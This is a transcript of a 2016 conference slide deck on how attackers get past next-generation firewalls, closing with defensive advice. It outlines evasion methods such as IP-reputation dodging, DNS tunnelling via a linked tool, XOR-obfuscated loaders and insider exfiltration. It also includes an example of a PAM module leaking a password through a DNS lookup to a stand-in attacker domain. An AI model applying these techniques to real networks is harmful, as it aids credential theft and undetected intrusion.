Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Defeating Next Gen Firewalls

Defeating Next Gen Firewalls

Atlseccon 2016

01d4f345508a9e898004a4d4f6d6459e?s=128

evandentremont

April 10, 2016
Tweet

Transcript

  1. Defeating Next Gen Firewalls

  2. Topics • Past issues • Current issues • Future issues

    • What can I do?
  3. A Brief History Lesson • NAT • Stateful Firewalls •

    Port Based Rules • Application Based / Deep Packet Inspection • Active Probing
  4. Current State of Affairs NGFW are great for • beating

    script kiddies • beating mass scans • application control ◦ Bittorrent ◦ Netflix To be fair, this is 99.7% of attacks on the internet.
  5. L33T Script Kitty

  6. Current State of Affairs NGFW’s don't work against sophisticated attackers

    / advanced threats “Not allowed to call it a APT if it's OWASP top 10” - the Grugq
  7. Current Issues

  8. Evasion Evasion on inside not (usually) picked up by border

    firewall • Network visibility • Behind firewall • IDS doesn't typically inspect internal traffic.
  9. Alert Fatigue • True positive ◦ 99.7% (check this) according

    to fortigate ◦ Comparison to something to put in context • True Negative ◦ Legitimate traffic • False Negative ◦ Hurts more, not measurable • False Positive ◦ Affects reputation of vendor
  10. IP Reputation Antivirus / host level detection model applied to

    networks • Rent a botnet... • How long it takes for reputations to circulate? ◦ About an hour. • Keep within the lag and switch IP ◦ #Snowshoes
  11. IP Reputation 82.148.97.69

  12. IP Reputation 82.148.97.69

  13. IP Reputation - CDN • CDN’s cause collateral Damage ◦

    everyone takes advantage of cloud ◦ You're effectively unbannable on popular CDN ◦ Blocking AWS - 30% of web requests Netflix, Airbnb, Yelp, Comcast, Slack, Adobe, NASA, Dow, CIA...
  14. !Visibility Protocol tunneling / DNS / ICMP • DNS tunnel

    via authoritative servers ◦ Public code to do this! ▪ https://github.com/iagox86/dnscat2 ◦ Add a PAM module that calls edentremont.P@SSW0RD.badguy.net • Tor ◦ Anonymity network prevents IP Reputation • Legal Dept ◦ Attacks that aren’t publicly disclosed may not in signature lists (for liability reasons)
  15. Signatures • Content Analysis ◦ Deep inspection ▪ Computational complexity

    ▪ Latency ◦ Signature based detection ◦ IDS is reactive have to know about it first ◦ Brittle, signature based, if modified wont be found ▪ Loader around it and xor the binary. ▪ NOOP, obfuscation, etc.
  16. Low Tech Simply bypassing a NGFW is a legitimate attack

    against a NGFW. Concern for internal personnel / contractors • Walk into NSA with a Taylor Swift CD-RW with a single song on it. ◦ Walk out with the Snowden Archives • Dialing out over phone network ◦ 1 (800) BAD-GUYS ext 146 398 832 • Mail a RPi to a non-existent employee ◦ Physical access via their mailroom
  17. Future Issues We’re assuming we can even inspect traffic..

  18. Directly exploiting NGFW • Sending malformed executables that bork the

    signature detection ◦ They Fail Open ◦ Failsafe would be a DDOS. No easy answer • Magic Passwords ◦ Assuming vendor doesn’t drop the ball
  19. Cryptography • Certs are cheap to free.. • Let's encrypt

    for malware ◦ https://letsencrypt.org/2015/10/29/phishing-and-m alware.html ◦ “Not our job to be content watchdogs and a DV cert is not that” - Let’s Encrypt • Key pinning (HPKP) ◦ makes MITM implausible ◦ Facebook, Google, Dropbox, tor2web do it.
  20. Cryptography • End to end crypto makes it harder ◦

    Computationally expensive ◦ Introduces latency ◦ SNI collateral • SSL termination is usually impractical ◦ Not everyone can do it; ▪ University can, corp can. BYOD difficult, ▪ ISP can’t ◦ 11% of internet is SSL terminated. ◦ Not generally done at a national scale. ▪ Technically North Korea could • #redstarOS
  21. OSI Layer 8 • Moving further into OSI layers makes

    detection asymptotically more difficult ◦ HPKP means you can’t SSL terminate. ◦ Even if you could... • Hiding within legitimate traffic ◦ Infeasible in realtime ◦ Traditional; Hiding in images ◦ Hiding in videos - Youtube numbers station ◦ Hiding in syntax - HASK talk
  22. What’s even the point?!

  23. The Point What are you trying to protect? If you’re

    pwned, what's the goal? • Your data? ◦ Data loss prevention / Data loss protection ▪ filter can't be rich or intrusive enough • jpg of SIN numbers over Facebook • Sabotage? • Vandalism?
  24. What can I do?

  25. What can I do? • Patch your shit - Julien

    Savoie • Only store what you need to • Airgapped storage ◦ Robot tape loaders ◦ Encrypted offline storage / at rest ◦ Cryptolocker • Host level security ◦ Encryption provides end to end security ◦ The bad guy controls one end; ◦ You control the other.
  26. To be blunt; • On a scale of now to

    infinity… you are getting pwned. • How soon and what do you lose? • Minimizing impact is goal.
  27. Any Questions? I hereby unilaterally reserve the right to ignore

    902 Nerds and their agents.